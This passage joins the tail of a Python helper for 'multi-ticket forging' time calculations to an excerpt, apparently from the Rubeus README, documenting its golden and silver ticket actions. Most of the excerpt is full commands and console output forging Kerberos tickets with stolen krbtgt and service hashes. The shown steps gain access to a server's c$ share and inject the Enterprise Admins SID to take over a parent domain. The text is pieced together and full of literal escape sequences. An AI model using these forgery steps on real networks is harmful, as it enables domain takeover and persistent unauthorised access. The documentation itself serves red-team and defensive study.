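    if len(spec) < 2 or spec[-1] not in UNITS or not spec[:-1].isdigit():
        raise ValueError('bad relative time: %r' % spec)
    return int(spec[:-1]), spec[-1]


def add_months(base, months):
    """Calendar-aware month arithmetic: the day is clamped to the target month."""
    index = base.month - 1 + months
    year, month = base.year + index // 12, index % 12 + 1
    day = min(base.day, calendar.monthrange(year, month)[1])
    return base.replace(year=year, month=month, day=day)


def apply_relative(base, spec):
    """Return base shifted forward by a relative spec such as '10h' or '7d'."""
    count, unit = parse_relative(spec)
    if unit == 'M':
        return add_months(base, count)
    if unit == 'y':
        return add_months(base, 12 * count)
    return base + timedelta(**{UNITS[unit]: count})


def ticket_times(starttime, endtime='10h', renewtill='7d'):
    """EndTime and RenewTill relative to starttime (README defaults: 10h and 7d)."""
    return apply_relative(starttime, endtime), apply_relative(starttime, renewtill)


def start_times(starttime, rangeend, rangeinterval):
    """Start times for multi-ticket forging (/rangeend, /rangeinterval).
    Treating /rangeend as an inclusive bound is an assumption of this example."""
    last = apply_relative(starttime, rangeend)
    times, current = [], starttime
    while current <= last:
        times.append(current)
        current = apply_relative(current, rangeinterval)
    return times


# Constructed sample of the INI-style policy file read from SYSVOL; the two
# password-age values are in days (a negative maximum means never expires).
SAMPLE_POLICY = '''[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
'''


def password_ages(policy_text):
    """Return (MinimumPasswordAge, MaximumPasswordAge) in days from the policy file."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str          # keep the original key casing
    parser.read_string(policy_text)
    section = parser['System Access']
    return int(section['MinimumPasswordAge']), int(section['MaximumPasswordAge'])


def pac_password_times(passlastset, min_age_days, max_age_days):
    """PasswordCanChange and PasswordMustChange relative to PasswordLastSet.
    A negative maximum age means 'never', reported here as None."""
    can_change = passlastset + timedelta(days=min_age_days)
    must_change = None if max_age_days < 0 else passlastset + timedelta(days=max_age_days)
    return can_change, must_change


if __name__ == '__main__':
    start = parse_time('29/07/2021 00:22:38')
    end, renew = ticket_times(start)
    print('EndTime  :', end.strftime('%d/%m/%Y %H:%M:%S'))
    print('RenewTill:', renew.strftime('%d/%m/%Y %H:%M:%S'))
    for t in start_times(start, '4d', '1d'):
        print('StartTime:', t.strftime('%d/%m/%Y %H:%M:%S'))
    min_age, max_age = password_ages(SAMPLE_POLICY)
    print(pac_password_times(start, min_age, max_age))
```

Months and years are handled with calendar arithmetic rather than a fixed number of days, so '1M' from 31 January lands on the last day of February; the m/M distinction is enforced by the unit table, so a lowercase 'M' typo for minutes is rejected rather than silently producing a months-long lifetime.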
This will not print arguments related to the times the ticket is\r\nvalid for as those are likely required to be different for any future tickets you want to forge.\r\ngolden\r\nThe golden action will forge a TGT for the user /user:X encrypting the ticket with the hash passed with\r\n/des:X , /rc4:X , /aes128:X or /aes256:X and using the same key to create the ServerChecksum and\r\nKDCChecksum. The various arguments to set fields manually are described above or the /ldap flag can be used\r\nto automatically retrieve the information from the domain controller.\r\nThe /oldpac switch can be used to exclude the new Requestor and Attributes PAC_INFO_BUFFERs, added in\r\nresponse to CVE-2021-42287.\r\nThe /extendedupndns switch will include the new extended UpnDns elements. This involves adding 2 to the\r\nFlags, as well as including the samaccountname and account SID.\r\nThe /rodcNumber:x parameter was added to perform Kerberos Key List Requests. The value of this parameter is\r\nthe number specified after krbtgt_x in the msDS-KrbTgtLink attribute of the read-only domain controller, e.g.\r\nkrbtgt_12345 would be 12345. This request requires certain flags which can be set using\r\n/flags:forwardable,renewable,enc_pa_rep . The key ( /des:X , /rc4:X , /aes128:X or /aes256:X ) used to\r\nencrypt is the KRBTGT_x account's key. 
Further information can be found on Elad Shamir's blog post here.\r\nForging a TGT using the /ldap flag to retrieve the information and the /printcmd flag to print a command to\r\nforge another ticket with the same PAC information:\r\nC:\\Rubeus\u003eRubeus.exe golden /aes256:6a8941dcb801e0bf63444b830e5faabec24b442118ec60def839fd47a10ae3d5 /ldap /use\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGT\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=harmj0y)'\r\n[*] Retrieving domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-3237111427-1607930709-3979055039\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1106\r\n[*] Groups : 513\r\n[*] ServiceKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : 
KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 00:12:40\r\n[*] StartTime : 29/07/2021 00:12:40\r\n[*] EndTime : 29/07/2021 10:12:40\r\n[*] RenewTill : 05/08/2021 00:12:40\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Printing a command to recreate a ticket containing the information used within this ticket\r\nC:\\Rubeus\\Rubeus.exe golden /aes256:6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5 /user:harmj\r\nForging a TGT, explicitly setting everything on the command line:\r\nC:\\Rubeus\u003eRubeus.exe golden /aes256:6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5 /user:harm\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGT\r\n[*] Building PAC\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 39 of 100\n\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1106\r\n[*] Groups : 513\r\n[*] ServiceKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] 
AuthTime : 29/07/2021 00:18:19\r\n[*] StartTime : 29/07/2021 00:18:19\r\n[*] EndTime : 29/07/2021 10:18:19\r\n[*] RenewTill : 05/08/2021 00:18:19\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\nForging 5 TGTs starting on different days with 1 day interval between starttimes, with the first starting now, and\r\nusing LDAP to get the PAC information:\r\nC:\\Rubeus\u003eRubeus.exe golden /aes256:6a8941dcb801e0bf63444b830e5faabec24b442118ec60def839fd47a10ae3d5 /ldap /use\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGT\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 40 of 100\n\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=harmj0y)'\r\n[*] Retrieving domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-3237111427-1607930709-3979055039\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1106\r\n[*] Groups : 513\r\n[*] ServiceKey : 
6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 00:22:38\r\n[*] StartTime : 29/07/2021 00:22:38\r\n[*] EndTime : 29/07/2021 10:22:38\r\n[*] RenewTill : 05/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 41 of 100\n\n[*] AuthTime : 30/07/2021 00:22:38\r\n[*] StartTime : 30/07/2021 00:22:38\r\n[*] EndTime : 30/07/2021 10:22:38\r\n[*] RenewTill : 06/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 31/07/2021 00:22:38\r\n[*] StartTime : 31/07/2021 00:22:38\r\n[*] EndTime : 31/07/2021 10:22:38\r\n[*] RenewTill : 07/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] 
Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 01/08/2021 00:22:38\r\n[*] StartTime : 01/08/2021 00:22:38\r\n[*] EndTime : 01/08/2021 10:22:38\r\n[*] RenewTill : 08/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 02/08/2021 00:22:38\r\n[*] StartTime : 02/08/2021 00:22:38\r\n[*] EndTime : 02/08/2021 10:22:38\r\n[*] RenewTill : 09/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\nsilver\r\nThe silver action will forge a ticket for the user /user:X and service /service:SPN , encrypting the ticket with\r\nthe hash passed with /des:X , /rc4:X , /aes128:X or /aes256:X and using the same key to create the\r\nServerChecksum. If the /krbkey:X argument is passed this will be used to create the KDCChecksum and\r\nTicketChecksum (if the service is not krbtgt/domain.com or domain.com is different from the realm used\r\nwithin the ticket, i.e. it is a referral ticket), otherwise the same key used to encrypt the ticket is used. If\r\n/krbenctype:X is not passed, the same encryption type used by the service key is assumed for the KDCChecksum\r\nand TicketChecksum.\r\nThe /cname:X and /crealm:X arguments can be used to set different values for those fields within the\r\nEncTicketPart (encrypted part of the ticket); this is sometimes seen within referral delegation tickets. 
A\r\nS4UDelegationInfo PAC section can be added by passing the /s4uproxytarget:X and\r\n/s4utransitedservices:SPN1,SPN2,... arguments, this section provides a final target for delegation and the list\r\nof SPNs the delegation has happened through.\r\nThe /authdata flag can be used to add some generic Authorization Data sections to the EncTicketPart, by\r\ndefault this will include a KERB-LOCAL section and a KERB-AD-RESTRICTION-ENTRY section with some\r\ndefault values.\r\nThe /nofullpacsig flag will exclude the new FullPacChecksum, introduced to resolve the CVE-2022-37967\r\nvulnerability. This signature is included by default in any tickets not secured with the krbtgt key.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 43 of 100\n\nForging a service ticket to cifs/SQL1.rubeus.ghostpack.local for the user ccob using the services RC4 password\r\nhash and signing the KDCChecksum and TicketChecksum with the proper KRBTGT AES256 key, using LDAP\r\nwith alternate credentials to get the PAC information:\r\nC:\\Rubeus\u003edir \\\\SQL1.rubeus.ghostpack.local\\c$\r\nThe user name or password is incorrect.\r\nC:\\Rubeus\u003eRubeus.exe silver /service:cifs/SQL1.rubeus.ghostpack.local /rc4:f74b07eb77caa52b8d227a113cb649a6 /lda\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGS\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=ccob)'\r\n[*] Retrieving group and domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(distinguishedname=CN=Domain Admins,CN=Users,DC=rube\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] 
\\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[!] Unable to query forest root using System.DirectoryServices.ActiveDirectory.Forest, assuming rubeus.ghostpack\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1109\r\n[*] Groups : 512,513\r\n[*] ServiceKey : F74B07EB77CAA52B8D227A113CB649A6\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : cifs\r\n[*] Target : SQL1.rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 44 of 100\n\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGS for 'ccob' to 'cifs/SQL1.rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 01:00:23\r\n[*] StartTime : 29/07/2021 01:00:23\r\n[*] EndTime : 29/07/2021 11:00:23\r\n[*] RenewTill : 05/08/2021 01:00:23\r\n[*] base64(ticket.kirbi):\r\n doIFZTCCBWGgAwIBBaEDAgEWooIESDCCBERhggRAMIIEPKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n bG9jYWw=\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\SQL1.rubeus.ghostpack.local\\c$\r\n Volume in drive \\\\SQL1.rubeus.ghostpack.local\\c$ has no label.\r\n Volume Serial Number is 1AD6-20BE\r\n Directory of \\\\SQL1.rubeus.ghostpack.local\\c$\r\n15/09/2018 08:19 \u003cDIR\u003e PerfLogs\r\n20/07/2021 18:17 \u003cDIR\u003e Program Files\r\n20/07/2021 18:17 \u003cDIR\u003e Program Files (x86)\r\n21/07/2021 01:53 
\u003cDIR\u003e Rubeus\r\n20/07/2021 21:02 \u003cDIR\u003e temp\r\n20/07/2021 22:31 \u003cDIR\u003e Users\r\n20/07/2021 18:18 \u003cDIR\u003e Windows\r\n 0 File(s) 0 bytes\r\n 7 Dir(s) 124,275,159,040 bytes free\r\nForging a referral TGT for a trusting domain, using LDAP to retrieve the PAC information:\r\nC:\\Rubeus\u003eRubeus.exe silver /user:exploitph /ldap /service:krbtgt/dev.rubeus.ghostpack.local /rc4:856a102305584\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 45 of 100\n\nv2.0.0\r\n[*] Action: Build TGS\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=exploitph)'\r\n[*] Retrieving domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-3237111427-1607930709-3979055039\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1104\r\n[*] Groups : 513\r\n[*] ServiceKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] KDCKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] 
Service : krbtgt\r\n[*] Target : dev.rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'exploitph@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 02:45:54\r\n[*] StartTime : 29/07/2021 02:45:54\r\n[*] EndTime : 29/07/2021 12:45:54\r\n[*] RenewTill : 05/08/2021 02:45:54\r\n[*] base64(ticket.kirbi):\r\n doIFojCCBZ6gAwIBBaEDAgEWooIEfjCCBHphggR2MIIEcqADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n LmxvY2Fs\r\nThis ticket can then be used to request service tickets on the trusting domain using asktgs :\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 46 of 100\n\nC:\\Rubeus\u003eRubeus.exe asktgs /service:cifs/devdc1.dev.rubeus.ghostpack.local /dc:devdc1.dev.rubeus.ghostpack.loc\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: devdc1.dev.rubeus.ghostpack.local (192.168.71.85)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building TGS-REQ request for: 'cifs/devdc1.dev.rubeus.ghostpack.local'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFrzCCBaugAwIBBaEDAgEWooIEgzCCBH9hggR7MIIEd6ADAgEFoRwbGkRFVi5SVUJFVVMuR0hPU1RQ\r\n ...(snip)...\r\n ZXVzLmdob3N0cGFjay5sb2NhbA==\r\n ServiceName : cifs/devdc1.dev.rubeus.ghostpack.local\r\n ServiceRealm : DEV.RUBEUS.GHOSTPACK.LOCAL\r\n UserName : exploitph\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 29/07/2021 02:51:05\r\n EndTime : 29/07/2021 12:45:54\r\n RenewTill : 05/08/2021 02:45:54\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : v1Bnp3plKCePeRpg1hrtYkI7bPDk6vw5uoj5MBNSThw=\r\nForge a referral TGT for 
dev.ccob@dev.rubeus.ghostpack.local for the parent domain rubeus.ghostpack.local\r\nand include the SID of the Enterprise Admins group:\r\nC:\\Rubeus\u003eRubeus.exe silver /user:dev.ccob /ldap /service:krbtgt/rubeus.ghostpack.local /rc4:856a1023055848748e\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 47 of 100\n\nv2.0.0\r\n[*] Action: Build TGS\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller DevDC1.dev.rubeus.ghostpack.local\r\n[*] Searching path 'DC=dev,DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=dev.ccob)'\r\n[*] Retrieving domain policy information over LDAP from domain controller DevDC1.dev.rubeus.ghostpack.local\r\n[*] Searching path 'DC=dev,DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-2065789546-4129202522-221\r\n[*] Attempting to mount: \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller DevDC1.dev.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=dev.rubeus.\r\n[*] Building PAC\r\n[*] Domain : DEV.RUBEUS.GHOSTPACK.LOCAL (DEV)\r\n[*] SID : S-1-5-21-2065789546-4129202522-221898516\r\n[*] UserId : 1107\r\n[*] Groups : 513\r\n[*] ExtraSIDs : S-1-5-21-3237111427-1607930709-3979055039-519\r\n[*] ServiceKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] KDCKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] 
Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'dev.ccob@dev.rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 03:03:34\r\n[*] StartTime : 29/07/2021 03:03:34\r\n[*] EndTime : 29/07/2021 13:03:34\r\n[*] RenewTill : 05/08/2021 03:03:34\r\n[*] base64(ticket.kirbi):\r\n doIF0TCCBc2gAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoRwbGkRFVi5SVUJFVVMuR0hPU1RQ\r\n ...(snip)...\r\n G9zdHBhY2subG9jYWw=\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 48 of 100\n\nThis referral TGT can then be used to request service tickets for services in rubeus.ghostpack.local using the\r\nasktgs command and gain the privileges of the Enterprise Admins group:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /service:cifs/pdc1.rubeus.ghostpack.local /dc:pdc1.rubeus.ghostpack.local /ptt /tic\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: pdc1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building TGS-REQ request for: 'cifs/pdc1.rubeus.ghostpack.local'\r\n[+] TGS request successful!\r\n[+] Ticket successfully imported!\r\n[*] base64(ticket.kirbi):\r\n doIF9zCCBfOgAwIBBaEDAgEWooIE1DCCBNBhggTMMIIEyKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n ZnMbG3BkYzEucnViZXVzLmdob3N0cGFjay5sb2NhbA==\r\n ServiceName : cifs/pdc1.rubeus.ghostpack.local\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : dev.ccob\r\n UserRealm : DEV.RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 29/07/2021 03:04:26\r\n EndTime : 29/07/2021 13:03:34\r\n RenewTill : 05/08/2021 03:03:34\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\n KeyType 